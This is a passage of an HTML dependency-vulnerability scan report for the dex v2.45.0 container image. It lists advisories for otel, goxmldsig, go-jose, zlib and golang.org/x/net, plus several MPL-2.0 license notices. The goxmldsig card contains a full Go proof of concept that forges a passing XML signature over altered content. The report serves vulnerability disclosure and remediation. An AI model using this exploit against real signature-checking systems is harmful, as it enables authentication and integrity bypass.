<p>Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the <code>baggage</code> header extraction process. An attacker can cause excessive CPU and memory allocations by sending numerous <code>baggage</code> header lines, even if each individual value remains within the allowed size limit.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>go.opentelemetry.io/otel/internal/global</code> to version 1.41.0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-mh2q-q3fh-2475">GitHub Advisory</a></li>
|
||
<li><a href="https://github.com/open-telemetry/opentelemetry-go/commit/aa1894e09e3fe66860c7885cb40f98901b35277f">GitHub Commit</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELINTERNALGLOBAL-15928418">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
|
||
<h2 class="card__title">Improper Verification of Cryptographic Signature</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--high">
|
||
<span class="label__text">high severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Proof of Concept</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/dexidp/dex <span class="list-paths__item__arrow">›</span> /usr/local/bin/dex
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
github.com/russellhaering/goxmldsig
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/dexidp/dex@* and github.com/russellhaering/goxmldsig@v1.5.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/russellhaering/goxmldsig@v1.5.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="overview">Overview</h2>
|
||
<p><a href="https://github.com/russellhaering/goxmldsig">github.com/russellhaering/goxmldsig</a> is a XML Digital Signatures implemented in pure Go.</p>
|
||
<p>Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the <code>validateSignature</code> function in the <code>validate.go</code> file. An attacker can bypass integrity checks and alter the contents of signed elements by exploiting pointer aliasing on a loop variable, allowing them to replace one element's contents with another referenced element's.</p>
|
||
<h2 id="poc">PoC</h2>
|
||
<pre><code>package main
|
||
|
||
import (
|
||
"crypto/rand"
|
||
"crypto/rsa"
|
||
"crypto/tls"
|
||
"crypto/x509"
|
||
"encoding/base64"
|
||
"fmt"
|
||
"math/big"
|
||
"time"
|
||
|
||
"github.com/beevik/etree"
|
||
dsig "github.com/russellhaering/goxmldsig"
|
||
)
|
||
|
||
func main() {
|
||
key, err := rsa.GenerateKey(rand.Reader, 2048)
|
||
if err != nil {
|
||
panic(err)
|
||
}
|
||
|
||
template := &x509.Certificate{
|
||
SerialNumber: big.NewInt(1),
|
||
NotBefore: time.Now().Add(-1 * time.Hour),
|
||
NotAfter: time.Now().Add(1 * time.Hour),
|
||
}
|
||
|
||
certDER, err := x509.CreateCertificate(rand.Reader, template, template, &key.PublicKey, key)
|
||
if err != nil {
|
||
panic(err)
|
||
}
|
||
|
||
cert, _ := x509.ParseCertificate(certDER)
|
||
|
||
doc := etree.NewDocument()
|
||
root := doc.CreateElement("Root")
|
||
root.CreateAttr("ID", "target")
|
||
root.SetText("Malicious Content")
|
||
|
||
tlsCert := tls.Certificate{
|
||
Certificate: [][]byte{cert.Raw},
|
||
PrivateKey: key,
|
||
}
|
||
|
||
ks := dsig.TLSCertKeyStore(tlsCert)
|
||
signingCtx := dsig.NewDefaultSigningContext(ks)
|
||
|
||
sig, err := signingCtx.ConstructSignature(root, true)
|
||
if err != nil {
|
||
panic(err)
|
||
}
|
||
|
||
signedInfo := sig.FindElement("./SignedInfo")
|
||
|
||
existingRef := signedInfo.FindElement("./Reference")
|
||
existingRef.CreateAttr("URI", "#dummy")
|
||
|
||
originalEl := etree.NewElement("Root")
|
||
originalEl.CreateAttr("ID", "target")
|
||
originalEl.SetText("Original Content")
|
||
|
||
sig1, _ := signingCtx.ConstructSignature(originalEl, true)
|
||
ref1 := sig1.FindElement("./SignedInfo/Reference").Copy()
|
||
|
||
signedInfo.InsertChildAt(existingRef.Index(), ref1)
|
||
|
||
c14n := signingCtx.Canonicalizer
|
||
|
||
detachedSI := signedInfo.Copy()
|
||
if detachedSI.SelectAttr("xmlns:"+dsig.DefaultPrefix) == nil {
|
||
detachedSI.CreateAttr("xmlns:"+dsig.DefaultPrefix, dsig.Namespace)
|
||
}
|
||
|
||
canonicalBytes, err := c14n.Canonicalize(detachedSI)
|
||
if err != nil {
|
||
fmt.Println("c14n error:", err)
|
||
return
|
||
}
|
||
|
||
hash := signingCtx.Hash.New()
|
||
hash.Write(canonicalBytes)
|
||
digest := hash.Sum(nil)
|
||
|
||
rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
|
||
if err != nil {
|
||
panic(err)
|
||
}
|
||
|
||
sigVal := sig.FindElement("./SignatureValue")
|
||
sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
|
||
|
||
certStore := &dsig.MemoryX509CertificateStore{
|
||
Roots: []*x509.Certificate{cert},
|
||
}
|
||
valCtx := dsig.NewDefaultValidationContext(certStore)
|
||
|
||
root.AddChild(sig)
|
||
|
||
doc.SetRoot(root)
|
||
str, _ := doc.WriteToString()
|
||
fmt.Println("XML:")
|
||
fmt.Println(str)
|
||
|
||
validated, err := valCtx.Validate(root)
|
||
if err != nil {
|
||
fmt.Println("validation failed:", err)
|
||
} else {
|
||
fmt.Println("validation ok")
|
||
fmt.Println("validated text:", validated.Text())
|
||
}
|
||
}
|
||
</code></pre>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>github.com/russellhaering/goxmldsig</code> to version 1.6.0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/russellhaering/goxmldsig/commit/db3d1e31f7535d7f5debb49851b9e9a2ff08b936">GitHub Commit</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-15692488">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
|
||
<h2 class="card__title">Uncaught Exception</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--high">
|
||
<span class="label__text">high severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
github.com/go-jose/go-jose/v4
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/go-jose/go-jose/v4@v4.1.3
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/go-jose/go-jose/v4@v4.1.3
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/go-jose/go-jose/v4@v4.1.3
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="overview">Overview</h2>
|
||
<p>Affected versions of this package are vulnerable to Uncaught Exception in the <code>cipher.KeyUnwrap</code> function when decrypting a JSON Web Encryption (JWE) object with a key wrapping algorithm (ending in 'KW', except for 'A128GCMKW', 'A192GCMKW', and 'A256GCMKW') and the <code>encrypted_key</code> field is empty. An attacker can cause a panic and disrupt service by submitting a crafted JWE object with an empty <code>encrypted_key</code> field or by directly invoking <code>cipher.KeyUnwrap</code> with a ciphertext parameter less than 16 bytes long.</p>
|
||
<p><strong>Note:</strong></p>
|
||
<p>This is only exploitable if the list of accepted key algorithms includes key wrapping algorithms.</p>
|
||
<h2 id="workaround">Workaround</h2>
|
||
<p>This vulnerability can be mitigated by prevalidating JWE objects to ensure the <code>encrypted_key</code> field is nonempty, or by excluding key wrapping algorithms from the list of accepted key algorithms.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>github.com/go-jose/go-jose/v4</code> to version 4.1.4 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8">GitHub Advisory</a></li>
|
||
<li><a href="https://github.com/go-jose/go-jose/commit/0e59876635f3dbf46d7b5e97b52bb75a3f96e7d9">GitHub Commit</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOJOSEGOJOSEV4-15875221">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">Improper Validation of Specified Quantity in Input</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Package Manager: alpine:3.23
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
zlib/zlib
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0 and zlib/zlib@1.3.1-r2
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
zlib/zlib@1.3.1-r2
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
zlib/zlib@1.3.1-r2
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
zlib/zlib@1.3.1-r2
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="nvd-description">NVD Description</h2>
|
||
<p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>zlib</code> package and not the <code>zlib</code> package as distributed by <code>Alpine</code>.</em>
|
||
<em>See <code>How to fix?</code> for <code>Alpine:3.23</code> relevant fixed versions and status.</em></p>
|
||
<p>zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>Alpine:3.23</code> <code>zlib</code> to version 1.3.2-r0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/">https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/</a></li>
|
||
<li><a href="https://github.com/madler/zlib/releases/tag/v1.3.2">https://github.com/madler/zlib/releases/tag/v1.3.2</a></li>
|
||
<li><a href="https://ostif.org/zlib-audit-complete/">https://ostif.org/zlib-audit-complete/</a></li>
|
||
<li><a href="https://github.com/madler/zlib/issues/904">https://github.com/madler/zlib/issues/904</a></li>
|
||
<li><a href="https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf">https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-ALPINE323-ZLIB-15435529">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">Uncaught Exception</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/dexidp/dex <span class="list-paths__item__arrow">›</span> /usr/local/bin/dex
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
golang.org/x/net/http2
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/dexidp/dex@* and golang.org/x/net/http2@v0.50.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
golang.org/x/net/http2@v0.50.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="overview">Overview</h2>
|
||
<p><a href="https://pkg.go.dev/golang.org/x/net/http2">golang.org/x/net/http2</a> is a work-in-progress HTTP/2 implementation for Go.</p>
|
||
<p>Affected versions of this package are vulnerable to Uncaught Exception due to missing nil check. An attacker can cause the server to panic and potentially disrupt service by sending specially crafted HTTP/2 frames with values between <code>0x0a</code> and <code>0x0f</code>.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>golang.org/x/net/http2</code> to version 0.51.0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://pkg.go.dev/vuln/GO-2026-4559">Go Advisory</a></li>
|
||
<li><a href="https://go.dev/cl/746180">Go Commit</a></li>
|
||
<li><a href="https://go.dev/issue/77652">Go Issue</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOLANGORGXNETHTTP2-15363313">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/dexidp/dex <span class="list-paths__item__arrow">›</span> /usr/local/bin/dex
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/openbao/openbao/api/v2
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/dexidp/dex@* and github.com/openbao/openbao/api/v2@v2.5.1
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/openbao/openbao/api/v2@v2.5.1
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:openbao:openbao:api:v2:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/vault/api/auth/userpass
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/vault/api/auth/userpass@v0.11.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/vault/api/auth/userpass@v0.11.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:vault:api:auth:userpass:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/vault/api/auth/aws
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/vault/api/auth/aws@v0.11.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/vault/api/auth/aws@v0.11.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:vault:api:auth:aws:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/vault/api
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/vault/api@v1.22.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/vault/api@v1.22.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:vault:api:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/serf/coordinate
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/serf/coordinate@v0.10.2
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/serf/coordinate@v0.10.2
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:serf:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/dexidp/dex <span class="list-paths__item__arrow">›</span> /usr/local/bin/dex
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/hcl/v2
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/dexidp/dex@* and github.com/hashicorp/hcl/v2@v2.18.1
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/hcl/v2@v2.18.1
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/hcl/v2/ext/customdecode@v2.18.1
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/hcl/v2/ext/tryfunc@v2.18.1
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/hcl/v2/gohcl@v2.18.1
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/hcl/v2/hclparse@v2.18.1
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/hcl/v2/hclsyntax@v2.18.1
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/hcl/v2/hclwrite@v2.18.1
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/hcl/v2/json@v2.18.1
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
